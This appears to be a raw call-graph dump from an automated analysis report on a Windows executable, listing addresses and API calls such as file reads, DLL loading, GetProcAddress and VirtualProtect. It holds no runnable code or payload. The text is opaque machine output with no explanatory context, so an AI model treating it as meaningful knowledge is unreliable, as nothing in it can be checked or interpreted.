_set_fmode 51637->51711 51639 7ff7c71b15db 51712 7ff7c71b2910 54 API calls _log10_special 51639->51712 51642 7ff7c71b1ca5 51641->51642 51953 7ff7c71c49f4 51642->51953 51645->51592 51646->51592 51648 7ff7c71bc5c9 51647->51648 51649 7ff7c71b31fa 51648->51649 51650 7ff7c71bc950 IsProcessorFeaturePresent 51648->51650 51651 7ff7c71bc968 51650->51651 51980 7ff7c71bcb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 51651->51980 51653 7ff7c71bc97b 51981 7ff7c71bc910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 51653->51981 51656->51603 51657->51609 51658->51609 51659->51592 51660->51592 51661->51592 51662->51592 51664 7ff7c71b45bc 51663->51664 51713 7ff7c71b9400 51664->51713 51666 7ff7c71b45e4 51667 7ff7c71b9400 2 API calls 51666->51667 51668 7ff7c71b45f7 51667->51668 51718 7ff7c71c6004 51668->51718 51671 7ff7c71bc5c0 _log10_special 8 API calls 51672 7ff7c71b1493 51671->51672 51672->51614 51672->51615 51674 7ff7c71c0774 51673->51674 51886 7ff7c71c04d4 51674->51886 51676 7ff7c71c078d 51676->51619 51678 7ff7c71b1268 51677->51678 51679 7ff7c71b126f 51678->51679 51680 7ff7c71b1297 51678->51680 51903 7ff7c71b2710 54 API calls _log10_special 51679->51903 51683 7ff7c71b12b1 51680->51683 51684 7ff7c71b12d4 51680->51684 51682 7ff7c71b1282 51682->51629 51904 7ff7c71c4f78 11 API calls _set_fmode 51683->51904 51688 7ff7c71b12e6 51684->51688 51698 7ff7c71b1309 memcpy_s 51684->51698 51686 7ff7c71b12b6 51905 7ff7c71b2910 54 API calls _log10_special 51686->51905 51906 7ff7c71c4f78 11 API calls _set_fmode 51688->51906 51690 7ff7c71c040c _fread_nolock 53 API calls 51690->51698 51691 7ff7c71b12eb 51907 7ff7c71b2910 54 API calls _log10_special 51691->51907 51693 7ff7c71c0180 37 API calls 51693->51698 51694 7ff7c71b12cf __std_exception_destroy 51694->51629 51695 7ff7c71b13cf 51908 7ff7c71b2710 54 API calls _log10_special 51695->51908 51698->51690 51698->51693 51698->51694 51698->51695 51899 7ff7c71c0b4c 51698->51899 51700 7ff7c71c00ec 51699->51700 51925 7ff7c71bfe98 51700->51925 51702 7ff7c71c0105 51702->51635 51703->51618 51704->51623 51705->51629 51706->51631 51707->51629 51937 7ff7c71c042c 51708->51937 51711->51639 51712->51629 51714 7ff7c71b9422 MultiByteToWideChar 51713->51714 51715 7ff7c71b9446 51713->51715 51714->51715 51717 7ff7c71b945c __std_exception_destroy 51714->51717 51716 7ff7c71b9463 MultiByteToWideChar 51715->51716 51715->51717 51716->51717 51717->51666 51719 7ff7c71c5f38 51718->51719 51720 7ff7c71c5f5e 51719->51720 51723 7ff7c71c5f91 51719->51723 51749 7ff7c71c4f78 11 API calls _set_fmode 51720->51749 51722 7ff7c71c5f63 51750 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 51722->51750 51725 7ff7c71c5fa4 51723->51725 51726 7ff7c71c5f97 51723->51726 51737 7ff7c71cac98 51725->51737 51751 7ff7c71c4f78 11 API calls _set_fmode 51726->51751 51728 7ff7c71b4606 51728->51671 51731 7ff7c71c5fc5 51744 7ff7c71cff3c 51731->51744 51732 7ff7c71c5fb8 51752 7ff7c71c4f78 11 API calls _set_fmode 51732->51752 51735 7ff7c71c5fd8 51753 7ff7c71c54e8 LeaveCriticalSection 51735->51753 51754 7ff7c71d0348 EnterCriticalSection 51737->51754 51739 7ff7c71cacaf 51740 7ff7c71cad0c 19 API calls 51739->51740 51741 7ff7c71cacba 51740->51741 51742 7ff7c71d03a8 _isindst LeaveCriticalSection 51741->51742 51743 7ff7c71c5fae 51742->51743 51743->51731 51743->51732 51755 7ff7c71cfc38 51744->51755 51748 7ff7c71cff96 51748->51735 51749->51722 51750->51728 51751->51728 51752->51728 51760 7ff7c71cfc73 __vcrt_InitializeCriticalSectionEx 51755->51760 51757 7ff7c71cff11 51774 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 51757->51774 51759 7ff7c71cfe43 51759->51748 51767 7ff7c71d6dc4 51759->51767 51760->51760 51765 7ff7c71cfe3a 51760->51765 51770 7ff7c71c7aac 51 API calls 3 library calls 51760->51770 51762 7ff7c71cfea5 51762->51765 51771 7ff7c71c7aac 51 API calls 3 library calls 51762->51771 51764 7ff7c71cfec4 51764->51765 51772 7ff7c71c7aac 51 API calls 3 library calls 51764->51772 51765->51759 51773 7ff7c71c4f78 11 API calls _set_fmode 51765->51773 51775 7ff7c71d63c4 51767->51775 51770->51762 51771->51764 51772->51765 51773->51757 51774->51759 51776 7ff7c71d63db 51775->51776 51777 7ff7c71d63f9 51775->51777 51829 7ff7c71c4f78 11 API calls _set_fmode 51776->51829 51777->51776 51780 7ff7c71d6415 51777->51780 51779 7ff7c71d63e0 51830 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 51779->51830 51786 7ff7c71d69d4 51780->51786 51784 7ff7c71d63ec 51784->51748 51832 7ff7c71d6708 51786->51832 51789 7ff7c71d6a61 51852 7ff7c71c8590 51789->51852 51790 7ff7c71d6a49 51864 7ff7c71c4f58 11 API calls _set_fmode 51790->51864 51794 7ff7c71d6a4e 51865 7ff7c71c4f78 11 API calls _set_fmode 51794->51865 51822 7ff7c71d6440 51822->51784 51831 7ff7c71c8568 LeaveCriticalSection 51822->51831 51829->51779 51830->51784 51833 7ff7c71d6734 51832->51833 51841 7ff7c71d674e 51832->51841 51833->51841 51877 7ff7c71c4f78 11 API calls _set_fmode 51833->51877 51835 7ff7c71d6743 51878 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 51835->51878 51837 7ff7c71d681d 51851 7ff7c71d687a 51837->51851 51883 7ff7c71c9be8 37 API calls 2 library calls 51837->51883 51838 7ff7c71d67cc 51838->51837 51881 7ff7c71c4f78 11 API calls _set_fmode 51838->51881 51841->51838 51879 7ff7c71c4f78 11 API calls _set_fmode 51841->51879 51842 7ff7c71d6876 51847 7ff7c71d68f8 51842->51847 51842->51851 51843 7ff7c71d6812 51882 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 51843->51882 51846 7ff7c71d67c1 51880 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 51846->51880 51884 7ff7c71ca970 17 API calls _isindst 51847->51884 51851->51789 51851->51790 51885 7ff7c71d0348 EnterCriticalSection 51852->51885 51864->51794 51865->51822 51877->51835 51878->51841 51879->51846 51880->51838 51881->51843 51882->51837 51883->51842 51887 7ff7c71c053e 51886->51887 51888 7ff7c71c04fe 51886->51888 51887->51888 51890 7ff7c71c054a 51887->51890 51898 7ff7c71ca884 37 API calls 2 library calls 51888->51898 51897 7ff7c71c54dc EnterCriticalSection 51890->51897 51892 7ff7c71c054f 51893 7ff7c71c0658 71 API calls 51892->51893 51894 7ff7c71c0561 51893->51894 51895 7ff7c71c54e8 _fread_nolock LeaveCriticalSection 51894->51895 51896 7ff7c71c0525 51895->51896 51896->51676 51898->51896 51900 7ff7c71c0b7c 51899->51900 51909 7ff7c71c089c 51900->51909 51902 7ff7c71c0b9a 51902->51698 51903->51682 51904->51686 51905->51694 51906->51691 51907->51694 51908->51694 51910 7ff7c71c08e9 51909->51910 51911 7ff7c71c08bc 51909->51911 51910->51902 51911->51910 51912 7ff7c71c08f1 51911->51912 51913 7ff7c71c08c6 51911->51913 51916 7ff7c71c07dc 51912->51916 51923 7ff7c71ca884 37 API calls 2 library calls 51913->51923 51924 7ff7c71c54dc EnterCriticalSection 51916->51924 51918 7ff7c71c07f9 51919 7ff7c71c081c 74 API calls 51918->51919 51920 7ff7c71c0802 51919->51920 51921 7ff7c71c54e8 _fread_nolock LeaveCriticalSection 51920->51921 51922 7ff7c71c080d 51921->51922 51922->51910 51923->51910 51926 7ff7c71bfee1 51925->51926 51927 7ff7c71bfeb3 51925->51927 51934 7ff7c71bfed3 51926->51934 51935 7ff7c71c54dc EnterCriticalSection 51926->51935 51936 7ff7c71ca884 37 API calls 2 library calls 51927->51936 51930 7ff7c71bfef8 51931 7ff7c71bff14 72 API calls 51930->51931 51932 7ff7c71bff04 51931->51932 51933 7ff7c71c54e8 _fread_nolock LeaveCriticalSection 51932->51933 51933->51934 51934->51702 51936->51934 51938 7ff7c71c0456 51937->51938 51949 7ff7c71c0424 51937->51949 51939 7ff7c71c04a2 51938->51939 51940 7ff7c71c0465 __scrt_get_show_window_mode 51938->51940 51938->51949 51950 7ff7c71c54dc EnterCriticalSection 51939->51950 51951 7ff7c71c4f78 11 API calls _set_fmode 51940->51951 51942 7ff7c71c04aa 51944 7ff7c71c01ac _fread_nolock 51 API calls 51942->51944 51946 7ff7c71c04c1 51944->51946 51945 7ff7c71c047a 51952 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 51945->51952 51948 7ff7c71c54e8 _fread_nolock LeaveCriticalSection 51946->51948 51948->51949 51949->51628 51951->51945 51952->51949 51956 7ff7c71c4a4e 51953->51956 51954 7ff7c71c4a73 51971 7ff7c71ca884 37 API calls 2 library calls 51954->51971 51956->51954 51957 7ff7c71c4aaf 51956->51957 51972 7ff7c71c2c80 49 API calls _invalid_parameter_noinfo 51957->51972 51959 7ff7c71c4b8c 51962 7ff7c71ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 51959->51962 51960 7ff7c71c4a9d 51961 7ff7c71bc5c0 _log10_special 8 API calls 51960->51961 51963 7ff7c71b1cc8 51961->51963 51962->51960 51963->51599 51964 7ff7c71c4b46 51964->51959 51965 7ff7c71c4b61 51964->51965 51966 7ff7c71c4bb0 51964->51966 51969 7ff7c71c4b58 51964->51969 51973 7ff7c71ca9b8 51965->51973 51966->51959 51967 7ff7c71c4bba 51966->51967 51970 7ff7c71ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 51967->51970 51969->51959 51969->51965 51970->51960 51971->51960 51972->51964 51974 7ff7c71ca9ec 51973->51974 51975 7ff7c71ca9bd RtlFreeHeap 51973->51975 51974->51960 51975->51974 51976 7ff7c71ca9d8 GetLastError 51975->51976 51977 7ff7c71ca9e5 Concurrency::details::SchedulerProxy::DeleteThis 51976->51977 51979 7ff7c71c4f78 11 API calls _set_fmode 51977->51979 51979->51974 51980->51653 51982 7ffd94760a50 51983 7ffd94760a9c 51982->51983 51984 7ffd94760aae 00007FFDB2245630 51983->51984 51986 7ffd94760ac1 new[] 51983->51986 51984->51986 51988 7ffd94760bd2 51986->51988 51990 7ffd94758290 51986->51990 51987 7ffd94760e77 51987->51988 51996 7ffd9474c960 51987->51996 51992 7ffd94758321 new[] 51990->51992 51991 7ffd947583d2 00007FFDAC0619C0 51993 7ffd9475843c 51991->51993 51992->51991 51992->51992 51994 7ffd947585b3 51992->51994 51993->51994 52004 7ffd9474ef40 51993->52004 51994->51987 52002 7ffd9474c98d 51996->52002 51997 7ffd9474ca04 ReadFile 51998 7ffd9474ca9a 51997->51998 51997->52002 51999 7ffd9474c9a4 51998->51999 52000 7ffd9474cad9 00007FFDAC0619C0 51998->52000 51999->51988 52000->51999 52001 7ffd9474ca74 52013 7ffd9474c790 00007FFDAC0619C0 52001->52013 52002->51997 52002->51998 52002->51999 52002->52001 52007 7ffd9474ef91 52004->52007 52005 7ffd9474f160 CreateFileW 52005->52007 52007->52005 52008 7ffd9474f3e5 52007->52008 52010 7ffd9474f318 52007->52010 52011 7ffd9474f7a0 00007FFDAC0619C0 52007->52011 52012 7ffd9474c790 00007FFDAC0619C0 52008->52012 52010->51994 52011->52007 52012->52010 52013->51999 52014 7ffd94750180 GetSystemInfo 52015 7ffd947501b4 52014->52015 52016 7ffd9479dd00 52017 7ffd9479dd2c 52016->52017 52019 7ffd9479dd31 52016->52019 52020 7ffd947c1540 52017->52020 52021 7ffd947c1559 52020->52021 52023 7ffd947c1565 52020->52023 52024 7ffd947c1470 52021->52024 52023->52019 52025 7ffd947c14b7 52024->52025 52026 7ffd947c14aa 52024->52026 52028 7ffd947c150d 52025->52028 52029 7ffd947c0fb0 20 API calls 52025->52029 52030 7ffd947c0fb0 52026->52030 52028->52023 52029->52025 52045 7ffd947c0cb0 52030->52045 52032 7ffd947c106c 52035 7ffd947c1097 52032->52035 52036 7ffd947c10e1 52032->52036 52037 7ffd947c10e7 52032->52037 52051 7ffd94761fa0 52032->52051 52035->52025 52036->52037 52038 7ffd947c11db 52036->52038 52058 7ffd947b9a70 52036->52058 52037->52035 52071 7ffd9479e260 00007FFDAC0619C0 00007FFDAC0619C0 52037->52071 52038->52037 52070 7ffd94763300 00007FFDAC0619C0 00007FFDAC0619C0 52038->52070 52041 7ffd947c137b 52042 7ffd947c13a9 52041->52042 52068 7ffd9479b380 20 API calls 52041->52068 52042->52038 52069 7ffd9479e2f0 00007FFDAC0619C0 00007FFDAC0619C0 52042->52069 52046 7ffd947c0cdb 52045->52046 52047 7ffd947c0cd2 52045->52047 52046->52032 52047->52046 52072 7ffd947c1850 00007FFDAC0619C0 52047->52072 52049 7ffd947c0dc0 52049->52046 52083 7ffd947ff130 00007FFDAC0619C0 52049->52083 52055 7ffd94761fd7 52051->52055 52052 7ffd94762039 52052->52036 52055->52052 52057 7ffd947621f5 52055->52057 52091 7ffd94761b80 52055->52091 52098 7ffd94756150 11 API calls 52055->52098 52057->52052 52099 7ffd9475a2f0 00007FFDAC0619C0 00007FFDAC0619C0 new[] 52057->52099 52059 7ffd947b9a9d 52058->52059 52064 7ffd947b9aa6 52058->52064 52059->52041 52062 7ffd947b9f1a 52065 7ffd947b9fdd new[] 52062->52065 52142 7ffd947ff130 00007FFDAC0619C0 52062->52142 52064->52059 52064->52062 52129 7ffd947c1df0 52064->52129 52134 7ffd94776b10 52064->52134 52140 7ffd94777de0 00007FFDAC0619C0 52064->52140 52141 7ffd9476f460 00007FFDAC0619C0 52064->52141 52065->52041 52068->52042 52069->52038 52070->52037 52071->52035 52075 7ffd947c192b 52072->52075 52076 7ffd947c1949 52072->52076 52073 7ffd947c1afd 52084 7ffd947fb410 52073->52084 52075->52049 52076->52073 52076->52075 52077 7ffd947c1a6d 52076->52077 52077->52075 52078 7ffd947fb410 00007FFDAC0619C0 52077->52078 52082 7ffd947c1ad6 52077->52082 52078->52082 52079 7ffd94761fa0 16 API calls 52079->52082 52082->52075 52082->52079 52088 7ffd9479e260 00007FFDAC0619C0 00007FFDAC0619C0 52082->52088 52089 7ffd94763300 00007FFDAC0619C0 00007FFDAC0619C0 52082->52089 52083->52046 52085 7ffd947fb461 52084->52085 52087 7ffd947fb93a 52085->52087 52090 7ffd9479e710 00007FFDAC0619C0 52085->52090 52087->52082 52088->52082 52089->52082 52100 7ffd94758cf0 52091->52100 52093 7ffd94761b91 52096 7ffd94761cb4 52093->52096 52106 7ffd947590d0 52093->52106 52095 7ffd94761bb1 52095->52096 52120 7ffd94756150 11 API calls 52095->52120 52096->52055 52099->52052 52102 7ffd94758f1f 52100->52102 52103 7ffd94758d20 52100->52103 52104 7ffd94758d7d 52102->52104 52121 7ffd94753220 00007FFDAC0619C0 52102->52121 52103->52102 52103->52104 52105 7ffd9474c960 3 API calls 52103->52105 52104->52093 52105->52102 52107 7ffd947590f2 52106->52107 52108 7ffd94759125 52106->52108 52107->52095 52108->52107 52110 7ffd947592d4 52108->52110 52112 7ffd947592be 52108->52112 52114 7ffd947591f8 52108->52114 52110->52114 52116 7ffd947592f0 52110->52116 52111 7ffd9475932b 00007FFDAC0619C0 52111->52107 52122 7ffd94756d90 52112->52122 52114->52107 52126 7ffd94756150 11 API calls 52114->52126 52115 7ffd94759313 52128 7ffd94755850 00007FFDAC0619C0 00007FFDAC0619C0 00007FFDAC0619C0 00007FFDAC0619C0 new[] 52115->52128 52116->52111 52116->52115 52127 7ffd94752320 00007FFDAC0619C0 00007FFDAC0619C0 new[] 52116->52127 52119 7ffd9475931d 52119->52111 52121->52104 52123 7ffd94756dbf 52122->52123 52124 7ffd94756ddc 52123->52124 52125 7ffd9474c960 3 API calls 52123->52125 52124->52114 52125->52124 52127->52115 52128->52119 52131 7ffd947c1e28 52129->52131 52132 7ffd947c1e7e 52129->52132 52130 7ffd947c1850 19 API calls 52130->52132 52131->52064 52132->52130 52132->52131 52143 7ffd947a7cb0 00007FFDAC0619C0 00007FFDAC0619C0 52132->52143 52138 7ffd94776b2b 52134->52138 52139 7ffd94776b3c 52134->52139 52135 7ffd947c1df0 19 API calls 52135->52139 52136 7ffd94776e90 52136->52138 52144 7ffd9476f460 00007FFDAC0619C0 52136->52144 52138->52064 52139->52135 52139->52136 52139->52138 52140->52064 52141->52064 52142->52065 52143->52132 52144->52138 52145 7ff7c71c5698 52146 7ff7c71c56b2 52145->52146 52147 7ff7c71c56cf 52145->52147 52170 7ff7c71c4f58 11 API calls _set_fmode 52146->52170 52147->52146 52149 7ff7c71c56e2 CreateFileW 52147->52149 52151 7ff7c71c5716 52149->52151 52152 7ff7c71c574c 52149->52152 52150 7ff7c71c56b7 52171 7ff7c71c4f78 11 API calls _set_fmode 52150->52171 52173 7ff7c71c57ec 59 API calls 3 library calls 52151->52173 52174 7ff7c71c5c74 46 API calls 3 library calls 52152->52174 52156 7ff7c71c5751 52159 7ff7c71c5780 52156->52159 52160 7ff7c71c5755 52156->52160 52157 7ff7c71c56bf 52172 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 52157->52172 52158 7ff7c71c5724 52162 7ff7c71c5741 CloseHandle 52158->52162 52163 7ff7c71c572b CloseHandle 52158->52163 52176 7ff7c71c5a34 51 API calls 52159->52176 52175 7ff7c71c4eec 11 API calls 2 library calls 52160->52175 52164 7ff7c71c56ca 52162->52164 52163->52164 52167 7ff7c71c578d 52177 7ff7c71c5b70 21 API calls _fread_nolock 52167->52177 52169 7ff7c71c575f 52169->52164 52170->52150 52171->52157 52172->52164 52173->52158 52174->52156 52175->52169 52176->52167 52177->52169 52178 7ffd9477bf19 52179 7ffd9477bf28 52178->52179 52180 7ffd94761fa0 16 API calls 52179->52180 52181 7ffd9477c001 52179->52181 52182 7ffd9477fa1d 52179->52182 52183 7ffd9477bf64 52180->52183 52181->52182 52184 7ffd9477fbe7 52181->52184 52190 7ffd947797b7 52181->52190 52185 7ffd9477fb39 52182->52185 52189 7ffd947800aa 52182->52189 52194 7ffd94773490 13 API calls 52182->52194 52183->52181 52183->52182 52192 7ffd947635d0 00007FFDAC0619C0 00007FFDAC0619C0 52183->52192 52184->52185 52193 7ffd9479e260 00007FFDAC0619C0 00007FFDAC0619C0 52184->52193 52189->52185 52195 7ffd9479e260 00007FFDAC0619C0 00007FFDAC0619C0 52189->52195 52192->52181 52193->52185 52194->52189 52195->52185 52196 7ffd93d97b30 52197 7ffd93d986d1 52196->52197 52204 7ffd93d97b48 52196->52204 52198 7ffd93d985de LoadLibraryA 52199 7ffd93d985f8 52198->52199 52202 7ffd93d98617 GetProcAddress 52199->52202 52199->52204 52201 7ffd93d98639 VirtualProtect VirtualProtect 52201->52197 52202->52199 52203 7ffd93d9862e 52202->52203 52204->52198 52204->52201 52214 7ffd9477d637 52215 7ffd9477d671 52214->52215 52216 7ffd9477d65c 52214->52216 52227 7ffd947642f0 52215->52227 52237 7ffd94784470 CloseHandle GetCurrentThreadId CloseHandle 00007FFDAC0619C0 52216->52237 52219 7ffd9477d67d 52222 7ffd9477d668 52219->52222 52233 7ffd947644f0 52219->52233 52221 7ffd9477f0cb 52222->52221 52224 7ffd947800aa 52222->52224 52238 7ffd94773490 13 API calls 52222->52238 52226 7ffd9477fb40 52224->52226 52239 7ffd9479e260 00007FFDAC0619C0 00007FFDAC0619C0 52224->52239 52228 7ffd94764317 52227->52228 52229 7ffd947643c5 52227->52229 52231 7ffd947643ca 52228->52231 52244 7ffd947641c0 14 API calls 52228->52244 52229->52231 52240 7ffd947606a0 52229->52240 52231->52219 52234 7ffd94764510 52233->52234 52235 7ffd9476459c 52234->52235 52236 7ffd947606a0 14 API calls 52234->52236 52235->52222 52236->52234 52237->52222 52238->52224 52239->52226 52241 7ffd94760722 52240->52241 52242 7ffd947606c2 52240->52242 52243 7ffd947590d0 14 API calls 52241->52243 52242->52228 52243->52242 52244->52231 52245 7ff7c71bccac 52266 7ff7c71bce7c 52245->52266 52248 7ff7c71bcdf8 52415 7ff7c71bd19c 7 API calls 2 library calls 52248->52415 52249 7ff7c71bccc8 __scrt_acquire_startup_lock 52251 7ff7c71bce02 52249->52251 52256 7ff7c71bcce6 __scrt_release_startup_lock 52249->52256 52416 7ff7c71bd19c 7 API calls 2 library calls 52251->52416 52253 7ff7c71bce0d _CreateFrameInfo 52254 7ff7c71bcd0b 52255 7ff7c71bcd91 52272 7ff7c71bd2e4 52255->52272 52256->52254 52256->52255 52412 7ff7c71c9b9c 45 API calls 52256->52412 52258 7ff7c71bcd96 52275 7ff7c71b1000 52258->52275 52263 7ff7c71bcdb9 52263->52253 52414 7ff7c71bd000 7 API calls 52263->52414 52265 7ff7c71bcdd0 52265->52254 52267 7ff7c71bce84 52266->52267 52268 7ff7c71bce90 __scrt_dllmain_crt_thread_attach 52267->52268 52269 7ff7c71bccc0 52268->52269 52270 7ff7c71bce9d 52268->52270 52269->52248 52269->52249 52270->52269 52417 7ff7c71bd8f8 7 API calls 2 library calls 52270->52417 52418 7ff7c71da540 52272->52418 52276 7ff7c71b1009 52275->52276 52420 7ff7c71c54f4 52276->52420 52278 7ff7c71b37fb 52427 7ff7c71b36b0 52278->52427 52283 7ff7c71bc5c0 _log10_special 8 API calls 52286 7ff7c71b3ca7 52283->52286 52284 7ff7c71b391b 52288 7ff7c71b45b0 108 API calls 52284->52288 52285 7ff7c71b383c 52287 7ff7c71b1c80 49 API calls 52285->52287 52413 7ff7c71bd328 GetModuleHandleW 52286->52413 52289 7ff7c71b385b 52287->52289 52290 7ff7c71b392b 52288->52290 52499 7ff7c71b8a20 52289->52499 52292 7ff7c71b396a 52290->52292 52522 7ff7c71b7f80 52290->52522 52531 7ff7c71b2710 54 API calls _log10_special 52292->52531 52294 7ff7c71b388e 52303 7ff7c71b38bb __std_exception_destroy 52294->52303 52521 7ff7c71b8b90 40 API calls __std_exception_destroy 52294->52521 52296 7ff7c71b395d 52297 7ff7c71b3962 52296->52297 52298 7ff7c71b3984 52296->52298 52299 7ff7c71c00bc 74 API calls 52297->52299 52300 7ff7c71b1c80 49 API calls 52298->52300 52299->52292 52302 7ff7c71b39a3 52300->52302 52308 7ff7c71b1950 115 API calls 52302->52308 52304 7ff7c71b8a20 14 API calls 52303->52304 52311 7ff7c71b38de __std_exception_destroy 52303->52311 52304->52311 52306 7ff7c71b3a0b 52534 7ff7c71b8b90 40 API calls __std_exception_destroy 52306->52534 52310 7ff7c71b39ce 52308->52310 52309 7ff7c71b3a17 52535 7ff7c71b8b90 40 API calls __std_exception_destroy 52309->52535 52310->52289 52313 7ff7c71b39de 52310->52313 52317 7ff7c71b390e __std_exception_destroy 52311->52317 52533 7ff7c71b8b30 40 API calls __std_exception_destroy 52311->52533 52532 7ff7c71b2710 54 API calls _log10_special 52313->52532 52314 7ff7c71b3a23 52536 7ff7c71b8b90 40 API calls __std_exception_destroy 52314->52536 52318 7ff7c71b8a20 14 API calls 52317->52318 52319 7ff7c71b3a3b 52318->52319 52320 7ff7c71b3a60 __std_exception_destroy 52319->52320 52321 7ff7c71b3b2f 52319->52321 52334 7ff7c71b3aab 52320->52334 52537 7ff7c71b8b30 40 API calls __std_exception_destroy 52320->52537 52538 7ff7c71b2710 54 API calls _log10_special 52321->52538 52324 7ff7c71b8a20 14 API calls 52325 7ff7c71b3bf4 __std_exception_destroy 52324->52325 52326 7ff7c71b3d41 52325->52326 52327 7ff7c71b3c46 52325->52327 52543 7ff7c71b44d0 49 API calls 52326->52543 52328 7ff7c71b3c50 52327->52328 52329 7ff7c71b3cd4 52327->52329 52539 7ff7c71b90e0 59 API calls _log10_special 52328->52539 52332 7ff7c71b8a20 14 API calls 52329->52332 52336 7ff7c71b3ce0 52332->52336 52333 7ff7c71b3d4f 52337 7ff7c71b3d71 52333->52337 52338 7ff7c71b3d65 52333->52338 52334->52324 52335 7ff7c71b3c55 52339 7ff7c71b3c61 52335->52339 52340 7ff7c71b3cb3 52335->52340 52336->52339 52343 7ff7c71b3ced 52336->52343 52342 7ff7c71b1c80 49 API calls 52337->52342 52544 7ff7c71b4620 52338->52544 52540 7ff7c71b2710 54 API calls _log10_special 52339->52540 52541 7ff7c71b8850 86 API calls 2 library calls 52340->52541 52354 7ff7c71b3d2b __std_exception_destroy 52342->52354 52346 7ff7c71b1c80 49 API calls 52343->52346 52349 7ff7c71b3d0b 52346->52349 52347 7ff7c71b3dc4 52350 7ff7c71b9400 2 API calls 52347->52350 52348 7ff7c71b3cbb 52351 7ff7c71b3cbf 52348->52351 52352 7ff7c71b3cc8 52348->52352 52353 7ff7c71b3d12 52349->52353 52349->52354 52356 7ff7c71b3dd7 SetDllDirectoryW 52350->52356 52351->52339 52352->52354 52542 7ff7c71b2710 54 API calls _log10_special 52353->52542 52354->52347 52355 7ff7c71b3da7 SetDllDirectoryW LoadLibraryExW 52354->52355 52355->52347 52359 7ff7c71b3e0a 52356->52359 52404 7ff7c71b3e5a 52356->52404 52361 7ff7c71b8a20 14 API calls 52359->52361 52360 7ff7c71b3808 __std_exception_destroy 52360->52283 52370 7ff7c71b3e16 __std_exception_destroy 52361->52370 52362 7ff7c71b3ffc 52363 7ff7c71b4006 PostMessageW GetMessageW 52362->52363 52364 7ff7c71b4029 52362->52364 52363->52364 52512 7ff7c71b3360 52364->52512 52365 7ff7c71b3f1b 52555 7ff7c71b33c0 121 API calls 2 library calls 52365->52555 52367 7ff7c71b3f23 52367->52360 52368 7ff7c71b3f2b 52367->52368 52556 7ff7c71b90c0 LocalFree 52368->52556 52373 7ff7c71b3ef2 52370->52373 52377 7ff7c71b3e4e 52370->52377 52554 7ff7c71b8b30 40 API calls __std_exception_destroy 52373->52554 52377->52404 52547 7ff7c71b6db0 54 API calls _set_fmode 52377->52547 52380 7ff7c71b4043 52558 7ff7c71b6fb0 FreeLibrary 52380->52558 52385 7ff7c71b404f 52386 7ff7c71b3e6c 52548 7ff7c71b7330 117 API calls 2 library calls 52386->52548 52390 7ff7c71b3e81 52393 7ff7c71b3ea2 52390->52393 52406 7ff7c71b3e85 52390->52406 52549 7ff7c71b6df0 120 API calls _log10_special 52390->52549 52393->52406 52550 7ff7c71b71a0 125 API calls 52393->52550 52397 7ff7c71b3ee0 52553 7ff7c71b6fb0 FreeLibrary 52397->52553 52398 7ff7c71b3eb7 52398->52406 52551 7ff7c71b74e0 55 API calls 52398->52551 52404->52362 52404->52365 52406->52404 52552 7ff7c71b2a50 54 API calls _log10_special 52406->52552 52412->52255 52413->52263 52414->52265 52415->52251 52416->52253 52417->52269 52419 7ff7c71bd2fb GetStartupInfoW 52418->52419 52419->52258 52422 7ff7c71cf4f0 52420->52422 52423 7ff7c71cf596 52422->52423 52424 7ff7c71cf543 52422->52424 52560 7ff7c71cf3c8 71 API calls _fread_nolock 52423->52560 52559 7ff7c71ca884 37 API calls 2 library calls 52424->52559 52426 7ff7c71cf56c 52426->52278 52561 7ff7c71bc8c0 52427->52561 52430 7ff7c71b3710 52563 7ff7c71b92f0 FindFirstFileExW 52430->52563 52431 7ff7c71b36eb GetLastError 52568 7ff7c71b2c50 51 API calls _log10_special 52431->52568 52435 7ff7c71b3723 52569 7ff7c71b9370 CreateFileW GetFinalPathNameByHandleW CloseHandle 52435->52569 52436 7ff7c71b377d 52571 7ff7c71b94b0 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 52436->52571 52438 7ff7c71bc5c0 _log10_special 8 API calls 52440 7ff7c71b37b5 52438->52440 52440->52360 52449 7ff7c71b1950 52440->52449 52441 7ff7c71b3730 52443 7ff7c71b3734 52441->52443 52444 7ff7c71b374c __vcrt_InitializeCriticalSectionEx 52441->52444 52442 7ff7c71b378b 52445 7ff7c71b3706 52442->52445 52572 7ff7c71b2810 49 API calls _log10_special 52442->52572 52570 7ff7c71b2810 49 API calls _log10_special 52443->52570 52444->52436 52445->52438 52448 7ff7c71b3745 52448->52445 52450 7ff7c71b45b0 108 API calls 52449->52450 52451 7ff7c71b1985 52450->52451 52452 7ff7c71b1c43 52451->52452 52453 7ff7c71b7f80 83 API calls 52451->52453 52454 7ff7c71bc5c0 _log10_special 8 API calls 52452->52454 52455 7ff7c71b19cb 52453->52455 52456 7ff7c71b1c5e 52454->52456 52457 7ff7c71c0744 73 API calls 52455->52457 52470 7ff7c71b1a03 52455->52470 52456->52284 52456->52285 52459 7ff7c71b19e5 52457->52459 52458 7ff7c71c00bc 74 API calls 52458->52452 52460 7ff7c71b19e9 52459->52460 52461 7ff7c71b1a08 52459->52461 52573 7ff7c71c4f78 11 API calls _set_fmode 52460->52573 52462 7ff7c71c040c _fread_nolock 53 API calls 52461->52462 52464 7ff7c71b1a20 52462->52464 52466 7ff7c71b1a45 52464->52466 52467 7ff7c71b1a26 52464->52467 52465 7ff7c71b19ee 52574 7ff7c71b2910 54 API calls _log10_special 52465->52574 52473 7ff7c71b1a7b 52466->52473 52474 7ff7c71b1a5c 52466->52474 52575 7ff7c71c4f78 11 API calls _set_fmode 52467->52575 52470->52458 52471 7ff7c71b1a2b 52576 7ff7c71b2910 54 API calls _log10_special 52471->52576 52475 7ff7c71b1c80 49 API calls 52473->52475 52577 7ff7c71c4f78 11 API calls _set_fmode 52474->52577 52477 7ff7c71b1a92 52475->52477 52479 7ff7c71b1c80 49 API calls 52477->52479 52478 7ff7c71b1a61 52578 7ff7c71b2910 54 API calls _log10_special 52478->52578 52481 7ff7c71b1add 52479->52481 52482 7ff7c71c0744 73 API calls 52481->52482 52483 7ff7c71b1b01 52482->52483 